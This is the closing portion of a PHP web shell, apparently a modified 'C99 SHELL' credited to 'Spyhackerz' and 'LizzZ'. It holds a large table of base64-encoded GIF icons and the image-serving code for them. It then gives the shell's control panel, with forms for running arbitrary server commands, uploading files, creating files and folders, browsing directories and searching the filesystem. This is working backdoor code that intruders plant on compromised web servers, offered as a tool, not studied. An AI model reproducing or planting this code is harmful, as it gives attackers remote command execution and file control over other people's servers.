"mTP/zDP//2YAAGYAM2YAZmYAmWYAzGYA/2YzAGYzM2YzZmYzmWYzzGYz/2ZmAGZmM2ZmZmZmmWZm".
"zGZm/2aZAGaZM2aZZmaZmWaZzGaZ/2bMAGbMM2bMZmbMmWbMzGbM/2b/AGb/M2b/Zmb/mWb/zGb/".
"/5kAAJkAM5kAZpkAmZkAzJkA/5kzAJkzM5kzZpkzmZkzzJkz/5lmAJlmM5lmZplmmZlmzJlm/5mZ".
"AJmZM5mZZpmZmZmZzJmZ/5nMAJnMM5nMZpnMmZnMzJnM/5n/AJn/M5n/Zpn/mZn/zJn//8wAAMwA".
"M8wAZswAmcwAzMwA/8wzAMwzM8wzZswzmcwzzMwz/8xmAMxmM8xmZsxmmcxmzMxm/8yZAMyZM8yZ".
"ZsyZmcyZzMyZ/8zMAMzMM8zMZszMmczMzMzM/8z/AMz/M8z/Zsz/mcz/zMz///8AAP8AM/8AZv8A".
"mf8AzP8A//8zAP8zM/8zZv8zmf8zzP8z//9mAP9mM/9mZv9mmf9mzP9m//+ZAP+ZM/+ZZv+Zmf+Z".
"zP+Z///MAP/MM//MZv/Mmf/MzP/M////AP//M///Zv//mf//zP///yH5BAEAABAALAAAAAAJAAsA".
"AAg4AP8JREFQ4D+CCBOi4MawITeFCg/iQhEPxcSBlFCoQ5Fx4MSKv1BgRGGMo0iJFC2ehHjSoMt/".
"AQEAOw==",
"sql_button_empty"=>
"R0lGODlhCQAKAPcAAAAAAIAAAACAAICAAAAAgIAAgACAgICAgMDAwP8AAAD/AP//AAAA//8A/wD/".
"/////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMwAAZgAAmQAAzAAA/wAzAAAzMwAzZgAzmQAzzAAz/wBm".
"AABmMwBmZgBmmQBmzABm/wCZAACZMwCZZgCZmQCZzACZ/wDMAADMMwDMZgDMmQDMzADM/wD/AAD/".
"MwD/ZgD/mQD/zAD//zMAADMAMzMAZjMAmTMAzDMA/zMzADMzMzMzZjMzmTMzzDMz/zNmADNmMzNm".
"ZjNmmTNmzDNm/zOZADOZMzOZZjOZmTOZzDOZ/zPMADPMMzPMZjPMmTPMzDPM/zP/ADP/MzP/ZjP/".
"mTP/zDP//2YAAGYAM2YAZmYAmWYAzGYA/2YzAGYzM2YzZmYzmWYzzGYz/2ZmAGZmM2ZmZmZmmWZm".
"zGZm/2aZAGaZM2aZZmaZmWaZzGaZ/2bMAGbMM2bMZmbMmWbMzGbM/2b/AGb/M2b/Zmb/mWb/zGb/".
"/5kAAJkAM5kAZpkAmZkAzJkA/5kzAJkzM5kzZpkzmZkzzJkz/5lmAJlmM5lmZplmmZlmzJlm/5mZ".
"AJmZM5mZZpmZmZmZzJmZ/5nMAJnMM5nMZpnMmZnMzJnM/5n/AJn/M5n/Zpn/mZn/zJn//8wAAMwA".
"M8wAZswAmcwAzMwA/8wzAMwzM8wzZswzmcwzzMwz/8xmAMxmM8xmZsxmmcxmzMxm/8yZAMyZM8yZ".
"ZsyZmcyZzMyZ/8zMAMzMM8zMZszMmczMzMzM/8z/AMz/M8z/Zsz/mcz/zMz///8AAP8AM/8AZv8A".
"mf8AzP8A//8zAP8zM/8zZv8zmf8zzP8z//9mAP9mM/9mZv9mmf9mzP9m//+ZAP+ZM/+ZZv+Zmf+Z".
"zP+Z///MAP/MM//MZv/Mmf/MzP/M////AP//M///Zv//mf//zP///yH5BAEAABAALAAAAAAJAAoA".
"AAgjAP8JREFQ4D+CCBOiMMhQocKDEBcujEiRosSBFjFenOhwYUAAOw==",
"sql_button_insert"=>
"R0lGODlhDQAMAPcAAAAAAIAAAACAAICAAAAAgIAAgACAgICAgMDAwP8AAAD/AP//AAAA//8A/wD/".
"/////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMwAAZgAAmQAAzAAA/wAzAAAzMwAzZgAzmQAzzAAz/wBm".
"AABmMwBmZgBmmQBmzABm/wCZAACZMwCZZgCZmQCZzACZ/wDMAADMMwDMZgDMmQDMzADM/wD/AAD/".
"MwD/ZgD/mQD/zAD//zMAADMAMzMAZjMAmTMAzDMA/zMzADMzMzMzZjMzmTMzzDMz/zNmADNmMzNm".
"ZjNmmTNmzDNm/zOZADOZMzOZZjOZmTOZzDOZ/zPMADPMMzPMZjPMmTPMzDPM/zP/ADP/MzP/ZjP/".
"mTP/zDP//2YAAGYAM2YAZmYAmWYAzGYA/2YzAGYzM2YzZmYzmWYzzGYz/2ZmAGZmM2ZmZmZmmWZm".
"zGZm/2aZAGaZM2aZZmaZmWaZzGaZ/2bMAGbMM2bMZmbMmWbMzGbM/2b/AGb/M2b/Zmb/mWb/zGb/".
"/5kAAJkAM5kAZpkAmZkAzJkA/5kzAJkzM5kzZpkzmZkzzJkz/5lmAJlmM5lmZplmmZlmzJlm/5mZ".
"AJmZM5mZZpmZmZmZzJmZ/5nMAJnMM5nMZpnMmZnMzJnM/5n/AJn/M5n/Zpn/mZn/zJn//8wAAMwA".
"M8wAZswAmcwAzMwA/8wzAMwzM8wzZswzmcwzzMwz/8xmAMxmM8xmZsxmmcxmzMxm/8yZAMyZM8yZ".
"ZsyZmcyZzMyZ/8zMAMzMM8zMZszMmczMzMzM/8z/AMz/M8z/Zsz/mcz/zMz///8AAP8AM/8AZv8A".
"mf8AzP8A//8zAP8zM/8zZv8zmf8zzP8z//9mAP9mM/9mZv9mmf9mzP9m//+ZAP+ZM/+ZZv+Zmf+Z".
"zP+Z///MAP/MM//MZv/Mmf/MzP/M////AP//M///Zv//mf//zP///yH5BAEAABAALAAAAAANAAwA".
"AAgzAFEIHEiwoMGDCBH6W0gtoUB//1BENOiP2sKECzNeNIiqY0d/FBf+y0jR48eQGUc6JBgQADs=",
"up"=>
"R0lGODlhFAAUALMAAAAAAP////j4+OPj493d3czMzLKysoaGhk1NTf///wAAAAAAAAAAAAAAAAAA".
"AAAAACH5BAEAAAkALAAAAAAUABQAAAR0MMlJq734ns1PnkcgjgXwhcNQrIVhmFonzxwQjnie27jg".
"+4Qgy3XgBX4IoHDlMhRvggFiGiSwWs5XyDftWplEJ+9HQCyx2c1YEDRfwwfxtop4p53PwLKOjvvV".
"IXtdgwgdPGdYfng1IVeJaTIAkpOUlZYfHxEAOw==",
"write"=>
"R0lGODlhFAAUALMAAAAAAP///93d3czMzLKysoaGhmZmZl9fXwQEBP///wAAAAAAAAAAAAAAAAAA".
"AAAAACH5BAEAAAkALAAAAAAUABQAAAR0MMlJqyzFalqEQJuGEQSCnWg6FogpkHAMF4HAJsWh7/ze".
"EQYQLUAsGgM0Wwt3bCJfQSFx10yyBlJn8RfEMgM9X+3qHWq5iED5yCsMCl111knDpuXfYls+IK61".
"LXd+WWEHLUd/ToJFZQOOj5CRjiCBlZaXIBEAOw==",
"ext_asp"=>
"R0lGODdhEAAQALMAAAAAAIAAAACAAICAAAAAgIAAgACAgMDAwICAgP8AAAD/AP//AAAA//8A/wD/".
"/////ywAAAAAEAAQAAAESvDISasF2N6DMNAS8Bxfl1UiOZYe9aUwgpDTq6qP/IX0Oz7AXU/1eRgI".
"D6HPhzjSeLYdYabsDCWMZwhg3WWtKK4QrMHohCAS+hABADs=",
"ext_mp3"=>
"R0lGODlhEAAQACIAACH5BAEAAAYALAAAAAAQABAAggAAAP///4CAgMDAwICAAP//AAAAAAAAAANU".
"aGrS7iuKQGsYIqpp6QiZRDQWYAILQQSA2g2o4QoASHGwvBbAN3GX1qXA+r1aBQHRZHMEDSYCz3fc".
"IGtGT8wAUwltzwWNWRV3LDnxYM1ub6GneDwBADs=",
"ext_avi"=>
"R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAggAAAP///4CAgMDAwP8AAAAAAAAAAAAAAANM".
"WFrS7iuKQGsYIqpp6QiZ1FFACYijB4RMqjbY01DwWg44gAsrP5QFk24HuOhODJwSU/IhBYTcjxe4".
"PYXCyg+V2i44XeRmSfYqsGhAAgA7",
"ext_cgi"=>
"R0lGODlhEAAQAGYAACH5BAEAAEwALAAAAAAQABAAhgAAAJtqCHd3d7iNGa+HMu7er9GiC6+IOOu9".
"DkJAPqyFQql/N/Dlhsyyfe67Af/SFP/8kf/9lD9ETv/PCv/cQ//eNv/XIf/ZKP/RDv/bLf/cMah6".
"LPPYRvzgR+vgx7yVMv/lUv/mTv/fOf/MAv/mcf/NA//qif/MAP/TFf/xp7uZVf/WIP/OBqt/Hv/S".
"Ev/hP+7OOP/WHv/wbHNfP4VzV7uPFv/pV//rXf/ycf/zdv/0eUNJWENKWsykIk9RWMytP//4iEpQ".
"Xv/9qfbptP/uZ93GiNq6XWpRJ//iQv7wsquEQv/jRAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
"AAAAAAAAAAAAAAAAAAAAAAeegEyCg0wBhIeHAYqIjAEwhoyEAQQXBJCRhQMuA5eSiooGIwafi4UM".
"BagNFBMcDR4FQwwBAgEGSBBEFSwxNhAyGg6WAkwCBAgvFiUiOBEgNUc7w4ICND8PKCFAOi0JPNKD".
"AkUnGTkRNwMS34MBJBgdRkJLCD7qggEPKxsJKiYTBweJkjhQkk7AhxQ9FqgLMGBGkG8KFCg8JKAi".
"RYtMAgEAOw==",
"ext_cmd"=>
"R0lGODlhEAAQACIAACH5BAEAAAcALAAAAAAQABAAggAAAP///4CAgMDAwAAAgICAAP//AAAAAANI".
"eLrcJzDKCYe9+AogBvlg+G2dSAQAipID5XJDIM+0zNJFkdL3DBg6HmxWMEAAhVlPBhgYdrYhDQCN".
"dmrYAMn1onq/YKpjvEgAADs=",
"ext_cpp"=>
"R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAgv///wAAAAAAgICAgMDAwAAAAAAAAAAAAANC".
"WLPc9XCASScZ8MlKicobBwRkEIkVYWqT4FICoJ5v7c6s3cqrArwinE/349FiNoFw44rtlqhOL4Ra".
"Eq7YrLDE7a4SADs=",
"ext_ini"=>
"R0lGODlhEAAQACIAACH5BAEAAAYALAAAAAAQABAAggAAAP///8DAwICAgICAAP//AAAAAAAAAANL".
"aArB3ioaNkK9MNbHs6lBKIoCoI1oUJ4N4DCqqYBpuM6hq8P3hwoEgU3mawELBEaPFiAUAMgYy3VM".
"SnEjgPVarHEHgrB43JvszsQEADs=",
"ext_diz"=>
"R0lGODlhEAAQAHcAACH5BAEAAJUALAAAAAAQABAAhwAAAP///15phcfb6NLs/7Pc/+P0/3J+l9bs".
"/52nuqjK5/n///j///7///r//0trlsPn/8nn/8nZ5trm79nu/8/q/9Xt/9zw/93w/+j1/9Hr/+Dv".
"/d7v/73H0MjU39zu/9br/8ne8tXn+K6/z8Xj/LjV7dDp/6K4y8bl/5O42Oz2/7HW9Ju92u/9/8T3".
"/+L//+7+/+v6/+/6/9H4/+X6/+Xl5Pz//+/t7fX08vD//+3///P///H///P7/8nq/8fp/8Tl98zr".
"/+/z9vT4++n1/b/k/dny/9Hv/+v4/9/0/9fw/8/u/8vt/+/09xUvXhQtW4KTs2V1kw4oVTdYpDZX".
"pVxqhlxqiExkimKBtMPL2Ftvj2OV6aOuwpqlulyN3cnO1wAAXQAAZSM8jE5XjgAAbwAAeURBYgAA".
"dAAAdzZEaE9wwDZYpmVviR49jG12kChFmgYuj6+1xeLn7Nzj6pm20oeqypS212SJraCyxZWyz7PW".
"9c/o/87n/8DX7MHY7q/K5LfX9arB1srl/2+fzq290U14q7fCz6e2yXum30FjlClHc4eXr6bI+bTK".
"4rfW+NXe6Oby/5SvzWSHr+br8WuKrQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
"AAjgACsJrDRHSICDQ7IMXDgJx8EvZuIcbPBooZwbBwOMAfMmYwBCA2sEcNBjJCMYATLIOLiokocm".
"C1QskAClCxcGBj7EsNHoQAciSCC1mNAmjJgGGEBQoBHigKENBjhcCBAIzRoGFkwQMNKnyggRSRAg".
"2BHpDBUeewRV0PDHCp4BSgjw0ZGHzJQcEVD4IEHJzYkBfo4seYGlDBwgTCAAYvFE4KEBJYI4UrPF".
"CyIIK+woYjMwQQI6Cor8mKEnxR0nAhYKjHJFQYECkqSkSa164IM6LhLRrr3wwaBCu3kPFKCldkAA".
"Ow==",
"ext_doc"=>
"R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAggAAAP///8DAwAAA/4CAgAAAAAAAAAAAAANR".
"WErcrrCQQCslQA2wOwdXkIFWNVBA+nme4AZCuolnRwkwF9QgEOPAFG21A+Z4sQHO94r1eJRTJVmq".
"MIOrrPSWWZRcza6kaolBCOB0WoxRud0JADs=",
"ext_exe"=>
"R0lGODlhEwAOAKIAAAAAAP///wAAvcbGxoSEhP///wAAAAAAACH5BAEAAAUALAAAAAATAA4AAAM7".
"WLTcTiWSQautBEQ1hP+gl21TKAQAio7S8LxaG8x0PbOcrQf4tNu9wa8WHNKKRl4sl+y9YBuAdEqt".
"xhIAOw==",
"ext_h"=>
"R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAgv///wAAAAAAgICAgMDAwAAAAAAAAAAAAANB".
"WLPc9XCASScZ8MlKCcARRwVkEAKCIBKmNqVrq7wpbMmbbbOnrgI8F+q3w9GOQOMQGZyJOspnMkKo".
"Wq/NknbbSgAAOw==",
"ext_hpp"=>
"R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAgv///wAAAAAAgICAgMDAwAAAAAAAAAAAAANF".
"WLPc9XCASScZ8MlKicobBwRkEAGCIAKEqaFqpbZnmk42/d43yroKmLADlPBis6LwKNAFj7jfaWVR".
"UqUagnbLdZa+YFcCADs=",
"ext_htaccess"=>
"R0lGODlhEAAQACIAACH5BAEAAAYALAAAAAAQABAAggAAAP8AAP8A/wAAgIAAgP//AAAAAAAAAAM6".
"WEXW/k6RAGsjmFoYgNBbEwjDB25dGZzVCKgsR8LhSnprPQ406pafmkDwUumIvJBoRAAAlEuDEwpJ".
"AAA7",
"ext_html"=>
"R0lGODlhEwAQALMAAAAAAP///2trnM3P/FBVhrPO9l6Itoyt0yhgk+Xy/WGp4sXl/i6Z4mfd/HNz".
"c////yH5BAEAAA8ALAAAAAATABAAAAST8Ml3qq1m6nmC/4GhbFoXJEO1CANDSociGkbACHi20U3P".
"KIFGIjAQODSiBWO5NAxRRmTggDgkmM7E6iipHZYKBVNQSBSikukSwW4jymcupYFgIBqL/MK8KBDk".
"Bkx2BXWDfX8TDDaFDA0KBAd9fnIKHXYIBJgHBQOHcg+VCikVA5wLpYgbBKurDqysnxMOs7S1sxIR".
"ADs=",
"ext_jpg"=>
"R0lGODlhEAAQADMAACH5BAEAAAkALAAAAAAQABAAgwAAAP///8DAwICAgICAAP8AAAD/AIAAAACA".
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARccMhJk70j6K3FuFbGbULwJcUhjgHgAkUqEgJNEEAgxEci".
"Ci8ALsALaXCGJK5o1AGSBsIAcABgjgCEwAMEXp0BBMLl/A6x5WZtPfQ2g6+0j8Vx+7b4/NZqgftd".
"FxEAOw==",
"ext_js"=>
"R0lGODdhEAAQACIAACwAAAAAEAAQAIL///8AAACAgIDAwMD//wCAgAAAAAAAAAADUCi63CEgxibH".
"k0AQsG200AQUJBgAoMihj5dmIxnMJxtqq1ddE0EWOhsG16m9MooAiSWEmTiuC4Tw2BB0L8FgIAhs".
"a00AjYYBbc/o9HjNniUAADs=",
"ext_lnk"=>
"R0lGODlhEAAQAGYAACH5BAEAAFAALAAAAAAQABAAhgAAAABiAGPLMmXMM0y/JlfFLFS6K1rGLWjO".
"NSmuFTWzGkC5IG3TOo/1XE7AJx2oD5X7YoTqUYrwV3/lTHTaQXnfRmDGMYXrUjKQHwAMAGfNRHzi".
"Uww5CAAqADOZGkasLXLYQghIBBN3DVG2NWnPRnDWRwBOAB5wFQBBAAA+AFG3NAk5BSGHEUqwMABk".
"AAAgAAAwAABfADe0GxeLCxZcDEK6IUuxKFjFLE3AJ2HHMRKiCQWCAgBmABptDg+HCBZeDAqFBWDG".
"MymUFQpWBj2fJhdvDQhOBC6XF3fdR0O6IR2ODwAZAHPZQCSREgASADaXHwAAAAAAAAAAAAAAAAAA".
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
"AAAAAAAAAAAAAAAAAAAAAAeZgFBQPAGFhocAgoI7Og8JCgsEBQIWPQCJgkCOkJKUP5eYUD6PkZM5".
"NKCKUDMyNTg3Agg2S5eqUEpJDgcDCAxMT06hgk26vAwUFUhDtYpCuwZByBMRRMyCRwMGRkUg0xIf".
"1lAeBiEAGRgXEg0t4SwroCYlDRAn4SmpKCoQJC/hqVAuNGzg8E9RKBEjYBS0JShGh4UMoYASBiUQ".
"ADs=",
"ext_log"=>
"R0lGODlhEAAQADMAACH5BAEAAAgALAAAAAAQABAAg////wAAAMDAwICAgICAAAAAgAAA////AAAA".
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARQEKEwK6UyBzC475gEAltJklLRAWzbClRhrK4Ly5yg7/wN".
"zLUaLGBQBV2EgFLV4xEOSSWt9gQQBpRpqxoVNaPKkFb5Eh/LmUGzF5qE3+EMIgIAOw==",
"ext_php"=>
"R0lGODlhEAAQAAAAACH5BAEAAAEALAAAAAAQABAAgAAAAAAAAAImDA6hy5rW0HGosffsdTpqvFlg".
"t0hkyZ3Q6qloZ7JimomVEb+uXAAAOw==",
"ext_pl"=>
"R0lGODlhFAAUAKL/AP/4/8DAwH9/AP/4AL+/vwAAAAAAAAAAACH5BAEAAAEALAAAAAAUABQAQAMo".
"GLrc3gOAMYR4OOudreegRlBWSJ1lqK5s64LjWF3cQMjpJpDf6//ABAA7",
"ext_swf"=>
"R0lGODlhFAAUAMQRAP+cnP9SUs4AAP+cAP/OAIQAAP9jAM5jnM6cY86cnKXO98bexpwAAP8xAP/O".
"nAAAAP///////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5BAEA".
"ABEALAAAAAAUABQAAAV7YCSOZGme6PmsbMuqUCzP0APLzhAbuPnQAweE52g0fDKCMGgoOm4QB4GA".
"GBgaT2gMQYgVjUfST3YoFGKBRgBqPjgYDEFxXRpDGEIA4xAQQNR1NHoMEAACABFhIz8rCncMAGgC".
"NysLkDOTSCsJNDJanTUqLqM2KaanqBEhADs=",
"ext_tar"=>
"R0lGODlhEAAQAGYAACH5BAEAAEsALAAAAAAQABAAhgAAABlOAFgdAFAAAIYCUwA8ZwA8Z9DY4JIC".
"Wv///wCIWBE2AAAyUJicqISHl4CAAPD4/+Dg8PX6/5OXpL7H0+/2/aGmsTIyMtTc5P//sfL5/8XF".
"HgBYpwBUlgBWn1BQAG8aIABQhRbfmwDckv+H11nouELlrizipf+V3nPA/40CUzmm/wA4XhVDAAGD".
"UyWd/0it/1u1/3NzAP950P990mO5/7v14YzvzXLrwoXI/5vS/7Dk/wBXov9syvRjwOhatQCHV17p".
"uo0GUQBWnP++8Lm5AP+j5QBUlACKWgA4bjJQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
"AAAAAAAAAAAAAAAAAAAAAAeegAKCg4SFSxYNEw4gMgSOj48DFAcHEUIZREYoJDQzPT4/AwcQCQkg".
"GwipqqkqAxIaFRgXDwO1trcAubq7vIeJDiwhBcPExAyTlSEZOzo5KTUxMCsvDKOlSRscHDweHkMd".
"HUcMr7GzBufo6Ay87Lu+ii0fAfP09AvIER8ZNjc4QSUmTogYscBaAiVFkChYyBCIiwXkZD2oR3FB".
"u4tLAgEAOw==",
"ext_txt"=>
"R0lGODlhEwAQAKIAAAAAAP///8bGxoSEhP///wAAAAAAAAAAACH5BAEAAAQALAAAAAATABAAAANJ".
"SArE3lDJFka91rKpA/DgJ3JBaZ6lsCkW6qqkB4jzF8BS6544W9ZAW4+g26VWxF9wdowZmznlEup7".
"UpPWG3Ig6Hq/XmRjuZwkAAA7",
"ext_wri"=>
"R0lGODlhEAAQADMAACH5BAEAAAgALAAAAAAQABAAg////wAAAICAgMDAwICAAAAAgAAA////AAAA".
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARRUMhJkb0C6K2HuEiRcdsAfKExkkDgBoVxstwAAypduoao".
"a4SXT0c4BF0rUhFAEAQQI9dmebREW8yXC6Nx2QI7LrYbtpJZNsxgzW6nLdq49hIBADs=",
"ext_xml"=>
"R0lGODlhEAAQAEQAACH5BAEAABAALAAAAAAQABAAhP///wAAAPHx8YaGhjNmmabK8AAAmQAAgACA".
"gDOZADNm/zOZ/zP//8DAwDPM/wAA/wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
"AAAAAAAAAAAAAAAAAAVk4CCOpAid0ACsbNsMqNquAiA0AJzSdl8HwMBOUKghEApbESBUFQwABICx".
"OAAMxebThmA4EocatgnYKhaJhxUrIBNrh7jyt/PZa+0hYc/n02V4dzZufYV/PIGJboKBQkGPkEEQ".
"IQA7"
 );
 //For simple size- and speed-optimization.
 $imgequals = array(
  "ext_tar"=>array("ext_tar","ext_r00","ext_ace","ext_arj","ext_bz","ext_bz2","ext_tbz","ext_tbz2","ext_tgz","ext_uu","ext_xxe","ext_zip","ext_cab","ext_gz","ext_iso","ext_lha","ext_lzh","ext_pbk","ext_rar","ext_uuf"),
  "ext_php"=>array("ext_php","ext_php3","ext_php4","ext_php5","ext_phtml","ext_shtml","ext_htm"),
  "ext_jpg"=>array("ext_jpg","ext_gif","ext_png","ext_jpeg","ext_jfif","ext_jpe","ext_bmp","ext_ico","ext_tif","tiff"),
  "ext_html"=>array("ext_html","ext_htm"),
  "ext_avi"=>array("ext_avi","ext_mov","ext_mvi","ext_mpg","ext_mpeg","ext_wmv","ext_rm"),
  "ext_lnk"=>array("ext_lnk","ext_url"),
  "ext_ini"=>array("ext_ini","ext_css","ext_inf"),
  "ext_doc"=>array("ext_doc","ext_dot"),
  "ext_js"=>array("ext_js","ext_vbs"),
  "ext_cmd"=>array("ext_cmd","ext_bat","ext_pif"),
  "ext_wri"=>array("ext_wri","ext_rtf"),
  "ext_swf"=>array("ext_swf","ext_fla"),
  "ext_mp3"=>array("ext_mp3","ext_au","ext_midi","ext_mid"),
  "ext_htaccess"=>array("ext_htaccess","ext_htpasswd","ext_ht","ext_hta","ext_so")
 );
 if (!$getall)
 {
  header("Content-type: image/gif");
  header("Cache-control: public");
  header("Expires: ".date("r",mktime(0,0,0,1,1,2030)));
  header("Cache-control: max-age=".(60*60*24*7));
  header("Last-Modified: ".date("r",filemtime(__FILE__)));
  foreach($imgequals as $k=>$v) {if (in_array($img,$v)) {$img = $k; break;}}
  if (empty($images[$img])) {$img = "small_unk";}
  if (in_array($img,$ext_tar)) {$img = "ext_tar";}
  echo base64_decode($images[$img]);
 }
 else
 {
  foreach($imgequals as $a=>$b) {foreach ($b as $d) {if ($a != $d) {if (!empty($images[$d])) {echo("Warning! Remove \$images[".$d."]<br>");}}}}
  natsort($images);
  $k = array_keys($images);
  echo  "<center>";
  foreach ($k as $u) {echo $u.":<img src=\"".$surl."act=img&img=".$u."\" border=\"1\"><br>";}
  echo "</center>";
 }
 exit;
}
if ($act == "about") {echo  "<center><b>Hakkinda:<br>Bu Script Spyhackerz Tarafindan Yazilmistir.</font></font></a></b>";}
?>
</td></tr></table><a bookmark="minipanel"><br><TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="1" width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1>
<tr><td width="100%" height="1" valign="top" colspan="2"><p align="center"><b>:: <a href="<?php echo $surl; ?>act=cmd&d=<?php echo urlencode($d); ?>"><b>Applications</b></a> ::</b></p></td></tr>
<tr><td width="50%" height="1" valign="top"><center><b>Enter: </b><form action="<?php echo $surl; ?>"><input type=hidden name=act value="cmd"><input type=hidden name="d" value="<?php echo $dispd; ?>"><input type="text" name="cmd" size="50" value="<?php echo htmlspecialchars($cmd); ?>"><input type=hidden name="cmd_txt" value="1">&nbsp;<input type=submit name=submit value="OK"></form></td><td width="50%" height="1" valign="top"><center><b>Options </b><form action="<?php echo $surl; ?>act=cmd" method="POST"><input type=hidden name=act value="cmd"><input type=hidden name="d" value="<?php echo $dispd; ?>"><select name="cmd"><?php foreach ($cmdaliases as $als) {echo "<option value=\"".htmlspecialchars($als[1])."\">".htmlspecialchars($als[0])."</option>";} ?></select><input type=hidden name="cmd_txt" value="1">&nbsp;<input type=submit name=submit value="OK"></form></td></tr></TABLE>
<br>
<TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="1" width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1>
<tr>
 <td width="50%" height="1" valign="top"><center><b>:: <a href="<?php echo $surl; ?>act=search&d=<?php echo urlencode($d); ?>"><b>Call</b></a> ::</b><form method="POST"><input type=hidden name=act value="Search"><input type=hidden name="d" value="<?php echo $dispd; ?>"><input type="text" name="search_name" size="29" value="(.*)">&nbsp;<input type="checkbox" name="search_name_regexp" value="1"  checked> - regexp&nbsp;<input type=submit name=submit value="Search"></form></center></p></td>
 <td width="50%" height="1" valign="top"><center><b>:: <a href="<?php echo $surl; ?>act=upload&d=<?php echo $ud; ?>"><b>Upload</b></a> ::</b><form method="POST" ENCTYPE="multipart/form-data"><input type=hidden name=act value="upload"><input type="file" name="uploadfile"><input type=hidden name="miniform" value="1">&nbsp;<input type=submit name=submit value="Upload"><br><?php echo $wdt; ?></form></center></td>
</tr>
</table>

<br><TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="1" width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td width="50%" height="1" valign="top"><center><b>:: Create folder ::</b><form action="<?php echo $surl; ?>"><input type=hidden name=act value="mkdir"><input type=hidden name="d" value="<?php echo $dispd; ?>"><input type="text" name="mkdir" size="50" value="<?php echo $dispd; ?>">&nbsp;<input type=submit value="Create"><br><?php echo $wdt; ?></form></center></td><td width="50%" height="1" valign="top"><center><b>:: File creation ::</b><form method="POST"><input type=hidden name=act value="mkfile"><input type=hidden name="d" value="<?php echo $dispd; ?>"><input type="text" name="mkfile" size="50" value="<?php echo $dispd; ?>"><input type=hidden name="ft" value="edit">&nbsp;<input type=submit value="Create"><br><?php echo $wdt; ?></form></center></td></tr></table>
<br><TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="1" width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td width="50%" height="1" valign="top"><center><b>:: Go to Directory ::</b><form action="<?php echo $surl; ?>"><input type=hidden name=act value="ls"><input type="text" name="d" size="50" value="<?php echo $dispd; ?>">&nbsp;<input type=submit value="Go"></form></center></td><td width="50%" height="1" valign="top"><center><b>:: Enter file ::</b><form action="<?php echo $surl; ?>"><input type=hidden name=act value="gofile"><input type=hidden name="d" value="<?php echo $dispd; ?>"><input type="text" name="f" size="50" value="<?php echo $dispd; ?>">&nbsp;<input type=submit value="Go"></form></center></td></tr></table>
<br><TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=0 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td width="990" height="1" valign="top"><p align="center"><b>[ C99 SHELL <b>Edited By</b></a>LizzZ | <a href="http://google.com/">c99 txt</a> <a href="http://google.com/">c99 shell</a> Page: <?php echo round(getmicrotime()-starttime,4); ?> produced in sec. ]</body></html><?php chdir($lastdir); ashshexit(); ?>